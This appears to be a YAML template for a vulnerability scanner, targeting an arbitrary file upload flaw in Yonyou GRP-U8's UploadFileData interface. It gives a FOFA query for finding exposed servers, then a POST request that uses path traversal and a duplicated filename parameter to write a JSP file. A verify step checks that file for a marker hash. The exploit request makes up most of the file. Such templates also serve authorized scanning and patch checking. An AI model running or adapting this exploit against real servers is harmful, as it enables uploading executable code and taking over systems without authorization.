product: 用友GRP-U8
vName: 用友GRP-U8 UploadFileData任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友GRP-U8 UploadFileData接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限
version: ''
note: ''
search:
  FOFA: app="用友-GRP-U8"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17685037.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=..%2F&filename=52e039302a62d077.jsp&filename=1.jpg
      file:
        myFile:
          - test.jpg
          - 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /R9iPortal/52e039302a62d077.jsp
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and